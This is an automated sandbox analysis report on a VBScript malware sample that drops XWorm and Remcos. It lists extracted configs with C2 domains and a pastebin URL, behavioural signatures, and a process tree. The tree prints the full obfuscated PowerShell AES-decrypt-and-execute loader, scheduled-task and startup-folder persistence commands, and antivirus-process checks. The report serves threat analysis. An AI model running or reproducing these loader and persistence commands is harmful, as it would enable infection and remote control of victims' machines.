Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system -
submitted
12-07-2024 16:56
Static task
static1
Behavioral task
behavioral1
Sample
package011.vbs
Resource
win7-20240708-en
General
-
Target
package011.vbs
-
Size
150KB
-
MD5
23df05b7be963f02a76cd7fb64a1cccc
-
SHA1
a361a5214b9cfa838b77b4349fa0898db400fd97
-
SHA256
a8e815c5920b41708193a747a8635f3a10d5fc933b6743177b5353a01ad76717
-
SHA512
01ac143a46a5b81f23621ec9654a5f347269033ac2ea7e751a6b1df4cd9aee51c2be1023379669b5044604312884b14eaff49099c79cfc4890049b688f1222e1
-
SSDEEP
1536:yZccvQGghdpPZp+ogsUJW4Wrle/PhG+/kery+bGsGI38sv5HnIgs:QghdpP+og0S7hO
Malware Config
Extracted
xworm
5.0
UxOlPOZZNwNV9srk
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Extracted
remcos
nutsDOG
remgod54.duckdns.org:9898
backto54.duckdns.org:9897
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
words.exe
-
copy_folder
word
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmcvbwxcdfgbfdfdddddddddddddddddderrfdv-TTAN7Q
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
true
-
take_screenshot_time
5
-
take_screenshot_title
homedepot,etsy,checkout
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2376-29-0x0000000000400000-0x0000000000410000-memory.dmp | family_xworm
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
Consciousness.pif, Better.pif, Keeps.pif
description | pid | process | target process
PID 1048 created 3408 | 1048 | Consciousness.pif | Explorer.EXE
PID 1516 created 3408 | 1516 | Better.pif | Explorer.EXE
PID 4580 created 3408 | 4580 | Keeps.pif | Explorer.EXE
-
Blocklisted process makes network request 5 IoCs
Processes:
WScript.exe, powershell.exe
flow | pid | process
2 | 4708 | WScript.exe
4 | 4708 | WScript.exe
6 | 4708 | WScript.exe
15 | 3256 | powershell.exe
27 | 3256 | powershell.exe
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe, urbyyu.exe, vyxsmk.exe, diwdmd.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation | urbyyu.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation | vyxsmk.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation | diwdmd.exe
-
Drops startup file 6 IoCs
Processes:
cmd.exe, cmd.exe, cmd.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url | cmd.exe
-
Executes dropped EXE 7 IoCs
Processes:
urbyyu.exe, vyxsmk.exe, Consciousness.pif, Better.pif, diwdmd.exe, Keeps.pif, RegAsm.exe
pid | process
4720 | urbyyu.exe
636 | vyxsmk.exe
1048 | Consciousness.pif
1516 | Better.pif
4832 | diwdmd.exe
4580 | Keeps.pif
4996 | RegAsm.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\germano.vbs" | powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exe
description | pid | process | target process
PID 3256 set thread context of 2376 | 3256 | powershell.exe | AddInProcess32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exe, timeout.exe, timeout.exe
pid | process
1568 | timeout.exe
5080 | timeout.exe
924 | timeout.exe
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe
pid | process
5000 | tasklist.exe
1632 | tasklist.exe
3704 | tasklist.exe
4224 | tasklist.exe
3664 | tasklist.exe
800 | tasklist.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe, schtasks.exe, schtasks.exe
pid | process
436 | schtasks.exe
2876 | schtasks.exe
4532 | schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe, AddInProcess32.exe, Consciousness.pif, Better.pif, Keeps.pif
pid | process
3256 | powershell.exe
2376 | AddInProcess32.exe
1048 | Consciousness.pif
1516 | Better.pif
4580 | Keeps.pif
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exe, AddInProcess32.exe, tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe, tasklist.exe, RegAsm.exe
description | pid | process
Token: SeDebugPrivilege | 3256 | powershell.exe
Token: SeDebugPrivilege | 2376 | AddInProcess32.exe
Token: SeDebugPrivilege | 3664 | tasklist.exe
Token: SeDebugPrivilege | 800 | tasklist.exe
Token: SeDebugPrivilege | 5000 | tasklist.exe
Token: SeDebugPrivilege | 1632 | tasklist.exe
Token: SeDebugPrivilege | 3704 | tasklist.exe
Token: SeDebugPrivilege | 4224 | tasklist.exe
Token: SeDebugPrivilege | 4996 | RegAsm.exe
-
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
Consciousness.pif, Better.pif, Keeps.pif
pid | process
1048 | Consciousness.pif
1516 | Better.pif
4580 | Keeps.pif
-
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
Consciousness.pif, Better.pif, Keeps.pif
pid | process
1048 | Consciousness.pif
1516 | Better.pif
4580 | Keeps.pif
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AddInProcess32.exe, Keeps.pif
pid | process
2376 | AddInProcess32.exe
4580 | Keeps.pif
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.exe, powershell.exe, AddInProcess32.exe, urbyyu.exe, cmd.exe, vyxsmk.exe, Consciousness.pif, cmd.exe, cmd.exe
description | pid | process | target process
PID 4708 wrote to memory of 3256 | 4708 | WScript.exe | powershell.exe
PID 3256 wrote to memory of 4900 | 3256 | powershell.exe | cmd.exe
PID 3256 wrote to memory of 2376 | 3256 | powershell.exe | AddInProcess32.exe
PID 2376 wrote to memory of 4720 | 2376 | AddInProcess32.exe | urbyyu.exe
PID 4720 wrote to memory of 4584 | 4720 | urbyyu.exe | cmd.exe
PID 4584 wrote to memory of 3664 | 4584 | cmd.exe | tasklist.exe
PID 4584 wrote to memory of 4036 | 4584 | cmd.exe | findstr.exe
PID 2376 wrote to memory of 636 | 2376 | AddInProcess32.exe | vyxsmk.exe
PID 4584 wrote to memory of 800 | 4584 | cmd.exe | tasklist.exe
PID 4584 wrote to memory of 1904 | 4584 | cmd.exe | findstr.exe
PID 636 wrote to memory of 3196 | 636 | vyxsmk.exe | cmd.exe
PID 4584 wrote to memory of 2364 | 4584 | cmd.exe | cmd.exe
PID 4584 wrote to memory of 4960 | 4584 | cmd.exe | findstr.exe
PID 4584 wrote to memory of 2596 | 4584 | cmd.exe | cmd.exe
PID 4584 wrote to memory of 1048 | 4584 | cmd.exe | Consciousness.pif
PID 4584 wrote to memory of 1568 | 4584 | cmd.exe | timeout.exe
PID 1048 wrote to memory of 3092 | 1048 | Consciousness.pif | cmd.exe
PID 1048 wrote to memory of 4256 | 1048 | Consciousness.pif | cmd.exe
PID 3092 wrote to memory of 4532 | 3092 | cmd.exe | schtasks.exe
PID 3196 wrote to memory of 5000 | 3196 | cmd.exe | tasklist.exe
PID 3196 wrote to memory of 1032 | 3196 | cmd.exe | findstr.exe
Processes
Depth 1, PID 3408: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
Depth 2, PID 4708: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\package011.vbs"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI54017336715515162301463169167087CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
Depth 4, PID 4900: C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\germano.vbs"
Depth 4, PID 2376: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
Depth 5, PID 4720: C:\Users\Admin\AppData\Local\Temp\urbyyu.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\urbyyu.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
Depth 6, PID 4584: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /k move Technological Technological.cmd & Technological.cmd & exit
  - Suspicious use of WriteProcessMemory
Depth 7, PID 3664: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 4036: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "wrsa.exe opssvc.exe"
Depth 7, PID 800: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 1904: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Depth 7, PID 2364: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c md 111702
Depth 7, PID 4960: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /V "PayableAuthorsYaleCant" Recommendations
Depth 7, PID 2596: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c copy /b Jonathan + Hold + Average + Miniature + Lcd + Va + Floors + Thumbzilla + Dirt + Step + Libraries + Charm + Temperature + Considerable 111702\t
Depth 7, PID 1048: C:\Users\Admin\AppData\Local\Temp\111702\Consciousness.pif
  Command line: 111702\Consciousness.pif 111702\t
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
Depth 7, PID 1568: C:\Windows\SysWOW64\timeout.exe
  Command line: timeout 5
  - Delays execution with timeout.exe
Depth 5, PID 636: C:\Users\Admin\AppData\Local\Temp\vyxsmk.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\vyxsmk.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
Depth 6, PID 3196: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /k move Cardiff Cardiff.cmd & Cardiff.cmd & exit
  - Suspicious use of WriteProcessMemory
Depth 7, PID 5000: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 1032: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "wrsa.exe opssvc.exe"
Depth 7, PID 1632: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 4520: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Depth 7, PID 1560: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c md 785477
Depth 7, PID 3436: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /V "PNTORTURERACERP" False
Depth 7, PID 4088: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c copy /b Height + Pulling + Conditions + Formed + Rod + Commented + Transit 785477\d
Depth 7, PID 1516: C:\Users\Admin\AppData\Local\Temp\785477\Better.pif
  Command line: 785477\Better.pif 785477\d
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Depth 7, PID 5080: C:\Windows\SysWOW64\timeout.exe
  Command line: timeout 5
  - Delays execution with timeout.exe
Depth 5, PID 4832: C:\Users\Admin\AppData\Local\Temp\diwdmd.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\diwdmd.exe"
  - Checks computer location settings
  - Executes dropped EXE
Depth 6, PID 4588: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /c copy Elect Elect.cmd & Elect.cmd
Depth 7, PID 3704: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 1872: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "wrsa.exe opssvc.exe"
Depth 7, PID 4224: C:\Windows\SysWOW64\tasklist.exe
  Command line: tasklist
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
Depth 7, PID 3468: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Depth 7, PID 2688: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c md 750766
Depth 7, PID 4628: C:\Windows\SysWOW64\findstr.exe
  Command line: findstr /V "carbonecologyalbanyjones" Apartments
Depth 7, PID 3028: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c copy /b Triple + Boot + Rapidly + Steven + Electronic + Variance 750766\n
Depth 7, PID 4580: C:\Users\Admin\AppData\Local\Temp\750766\Keeps.pif
  Command line: 750766\Keeps.pif 750766\n
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
Depth 7, PID 924: C:\Windows\SysWOW64\timeout.exe
  Command line: timeout 5
  - Delays execution with timeout.exe
Depth 2, PID 3092: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c schtasks.exe /create /tn "Capture" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js'" /sc minute /mo 5 /F
  - Suspicious use of WriteProcessMemory
Depth 3, PID 4532: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks.exe /create /tn "Capture" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js'" /sc minute /mo 5 /F
  - Scheduled Task/Job: Scheduled Task
Depth 2, PID 4256: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url" & echo URL="C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url" & exit
  - Drops startup file
Depth 2, PID 2196: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c schtasks.exe /create /tn "Therefore" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js'" /sc minute /mo 5 /F
Depth 3, PID 436: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks.exe /create /tn "Therefore" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js'" /sc minute /mo 5 /F
  - Scheduled Task/Job: Scheduled Task
Depth 2, PID 2620: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url" & echo URL="C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url" & exit
  - Drops startup file
Depth 2, PID 2988: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c schtasks.exe /create /tn "Claimed" /tr "wscript //B 'C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js'" /sc minute /mo 5 /F
Depth 3, PID 2876: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks.exe /create /tn "Claimed" /tr "wscript //B 'C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js'" /sc minute /mo 5 /F
  - Scheduled Task/Job: Scheduled Task
Depth 2, PID 3068: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url" & echo URL="C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url" & exit
  - Drops startup file
Depth 2, PID 4996: C:\Users\Admin\AppData\Local\Temp\111702\RegAsm.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\111702\RegAsm.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads
-
Filesize
46KB
MD5f623897f24c434647c6df58dbb2714c0
SHA10880324e4c12a3f25bce3166e07c42057478ed55
SHA2567dff147eb98f0eb0661f1039ae2eaba0d683d459307c23b5b1ab09f0a2a14248
SHA51279d4f11cdb87180a4308364ef752911e42cc2f786695e69c6b810434db87a50b645dfb52a746174986f35ba7e224fc7a1c91620ceb5845045cc3f53aedb66b4f
-
Filesize
5KB
MD57f22e6e57dc49740310fc7141edc5c6b
SHA16837e8ad106dc84d69d696d7dc45209ab8f1dc28
SHA25638b74d222f1c75867853674d1beb47de3b4e547b4bb9d2970fe07bc7ad31c2b4
SHA512ddb2fd822911d30daff278ec81f7172db4f4ff3f35ca2ebd5097d919813c33b30ed3d225fbb14b1a8f1f6353becada8ece17015b91e737287e0e656cca326917
-
Filesize
23KB
MD5337fa73ab5c1daca187bcf19292c3535
SHA1ece4e580bece3c2bafb906d016e521faa1961150
SHA256c174522607779b3e451d492be82fa3d121b600b1c1f835266aa88beb9c5235b3
SHA512ad336d0efd26309cb1e3bacbb3debb5b158549b7f2b1ff7d6df906ec7a27b78170ad3be71d2df6d20c89d00fd5084f8cb3ddf46df2c261aa8a336a26e39eddcf
-
Filesize
148KB
MD54e219e580cb7e67cb8ef84b528e58946
SHA1324c6f45342b568117ef0d6cffd1b9bfcb2c83e0
SHA256bc219cc55d892d09ef613c6bbc7802dbd2273e7f36bbcb80a7c92bde38248b03
SHA512447cc9abe2769ce22b5f374e5352caad34679ec6b6091a72a219ac24c7b04164749cffc51d4f5478555e5d3e9480c23ff09227b9ace648d85c3c61ad04cc41a3
-
Filesize
68KB
MD5d08d7143f15dcedf61c53d89dc050bb5
SHA120a1352d5f0f27049ef075a3a2af2c579f5dfd29
SHA256c613252ed92297432c0aba487340e8034418dce8e66285deee9b8364db332536
SHA51209af2702e30533067f56d94829a68d979a7b415b289594ba553951727cb0e96a57e60d67e4bc1fe11c59f7c9671a2094ca050efc589ce2a8de7a390bbcd1070e
-
Filesize
69KB
MD56ef989b418fbb56bf1d5d0aff7f138fb
SHA1400e7124e3929c7894326461e8861d427e209ff6
SHA256343565665a9f06d928cf5f580921b652ea31cfc549db53bb0b03fe906e5ff768
SHA512d9385ce1714a3ece93c2ea6fabf21fe777c55a7e229c197b2f284c2586a7f40e646e7ec6a793ac4444f1c2344d77d3ba6ae50040dbcc710d300287683e9f7124
-
Filesize
9KB
MD52cd467ecbd06cebeeaa4383cfab947e0
SHA128fd519cf9d118b9c48171ad0b34bc42b29df92f
SHA25696e670146c683403cc8f7f84067cbc07c488203be8a846605997ae6d19b44b40
SHA512308e9fbd7b3c0ff5dd5d93392f1e43afe36145cef36e98cf7c7b058300addaebaed9d844d6872913cebb1cd8d43db5698d8fb6f5c4c6eec5bcf2ad8f7553c655
-
Filesize
25KB
MD57e5937aeb84367606948c7bda998decd
SHA1ca8e47f17b018d6bc4abbed7858426830d4b559e
SHA256ac6473a19cc8553ab91e572c562d7cf24c3a450a3143caeaeffa8d118ba5d083
SHA51275daaedbb8e844d4703ca46168cb3136f92774c9a7e48c5796e763a15a5816536cbab303acf4aad48f67c104cce471185a75dbfa60199a584c895b9f96d3ec26
-
Filesize
14KB
MD581b929ad677cd76b66df538c23aa9380
SHA1f44b857d1d5a25871b403f1faca744940955ba98
SHA256a38aa62c1beae4dc8a38da597e3b5fca4b0779595af0b20638a21b2410374bf3
SHA51286f27df9c7f7b0eda2c91999b61298830335aa96224b0557b871f69d10110e57f472c1590ad201101b6a4f5e089818e453f55520707390244fcedfdb78a1e046
-
Filesize
12KB
MD5c61b9fda3ac97c9738d2e5e4be5a2bcd
SHA18ab0ef010dd87f744e65d84adac6f2767047a261
SHA2563f5173a0879b0bd40cf3f2ec84f399afa11c3783a41f5763f80be91145b7e8c1
SHA5129251c31c4d02836a57ca84ee33e8bcf18750db99991d622873b3792503eb584d48669cba56297ac055c6654de906193c7deec770143dfc75fa8276db69182410
-
Filesize
51KB
MD5ed0d44249bbf2c0f25bf8beb540f97d5
SHA15acc9387eb0a16bf532b13654434281cffd1478d
SHA256f6f589b9a92302699dd43bd1d67c1e9bfbda158e256ccee35d170df882060648
SHA512a0641bc40e187d23e19d3da81bb11d29be930aa38330f999af37a455c7b362f81795c0f36e30d3cba702c35232cfe1e1198b69751bb3a78ad76bd03624e8cf3b
-
Filesize
4KB
MD57ad347b7ac39be8459feeec21afaf42b
SHA1d7317553d56e8f9db2d366f975cbc82a8a358566
SHA2566480a0aeb1b467026436f54a22112334072ac0bd11e5aedfed941cf024672864
SHA512f49efd5110dfd527c9a835fede7fc7f33f08de6ecec8deab86e13864935c290e676856d3aeaf69404213a55e7a59c3fa84373e7c0cd661dbe4b5ffc6b77a42d9
-
Filesize
109B
MD574805e7a0854e076056608bba4e1d937
SHA1045ffe44415f36970654f7ee6645029a729cc612
SHA256976157b5f84e1d9645e5e632fb7f3e50c17ac734d40ad3ca902ab3070ed084cb
SHA5126e783ed105e66733295b7f91373827deff999d4fc408c5fedd264e6673756ffd38fa956e6006f2e0c5ea36191de394da92e2d198ca4d7965980a6b8948243353
-
Filesize
5KB
MD51842ac823c58d8e9ca4c5ac3889808d5
SHA134bbacc70bd24aa6adbac734f0b3556c2731487d
SHA25697421ab8960159a060818186fe7e06569f7a76a3f8a11367fbc6cd777abe6f7b
SHA51238e6cdb0943bb1aef3bcf4585d4358845eccf92ef7fed9851a2cf767d7e3eb19e2d2d30cf8374318f5c21e945a77acb13b416c8eeb212a096905e7b1c576f2a2
-
Filesize
58KB
MD5f94c2d209bb74949149637c30ff4a780
SHA1e781029b232ec0b67c47c698a91b89f792da0f7d
SHA256b4dd90ea6873a0dad1946419f5163c75a070d81a110197aab4aca00d947a538a
SHA512ec1909473deba0b5a1abe3cb4aa99f802959d16db2696804f332693372b8e0b27961651459a6f2575dd97447acb61b0d0596c7f5883156c7b113faa2a4ac1600
-
Filesize
17KB
MD5918fdb7576e5c24e144d960ae5ff6e81
SHA17e9c17fc57dc3c159457f327c9f7db6fc92e12a5
SHA25686a842ed7cb53c26bca360b8203444f0bca7df6e458dfb1326be948a2cb85359
SHA512e1681c84f2df6d029e3d2d60802b0f1c55cb941b465008aa6b80a966aca7f6af26aa1ec31075e36bba5bfdbdbb5da76bfe921034c0776ee9fedace0ec92a9952
-
Filesize
81KB
MD5c91fac1246b1472b507269d9520eb1f0
SHA1a68d15aaa08c86f35489f9a2d3833fd66d237234
SHA25650f253e9631eb9caac14640a31756e1badd9516731da43dd96c3dcc13c41681e
SHA51206c7b1915931b40263de99b036849d53d010cf9c258fd7eef170cd76ad6346b75c505dcd8bba7d55fb2a31e51bdc412035c9c8b00b68a730fab74c27b9047067
-
Filesize
36KB
MD5c5fe450e2fa122a817da3e9835037774
SHA14f7138f25d7516a0782ae8e9038d8664ccdaaf32
SHA256e8fcf58eb0405a34dcabb7116362c1ac40c954fb1480fee37f40d5577317694c
SHA512925d5b7e9c1992cd64f22192aa032d1a760baa17815856d36d5c89644c2a2e2bfc341f8a2181b9c4dcc063df173399c68a448f2a1081e927ac65eced6b08a455
-
Filesize
28KB
MD53367fd241e72c1ab03e706182511909a
SHA1ac12d7fbd3cd83e30c96a5b89f37b4cfcdde1f1c
SHA2563892ad56776d2682a7bc9eddaa1f35c20ffb2f51c2af8788cede8ec1ef0eaa93
SHA5127b48394c89f9448a86757c8fca4b1843d1b04a8baf6b12570308f84cd860dc3ffc6d12e2453984bf3a6cf435a2621577d3af9ce990a70fa0a0267e6881855f43
-
Filesize
32KB
MD5a0741a2ce836cac907f8bae7c534c89d
SHA1b54dbad5790ffef62e808e0e6c6ac2dc5d97cca9
SHA256d3a8fabdd6c84ce85a2c81ec2370b105889130bb5cd917892ab00f42f8abc2e1
SHA512e32479b54d52a03930feb373874add6315d23bb32c5ba29f0d518a8571f1018dffa8bd481d09bac402934a6b0cd0c4d2f146b471393b6621ec2d2fa9e61e73e4
-
Filesize
143KB
MD5d77592a03dcfe86543c0409a0f1ed959
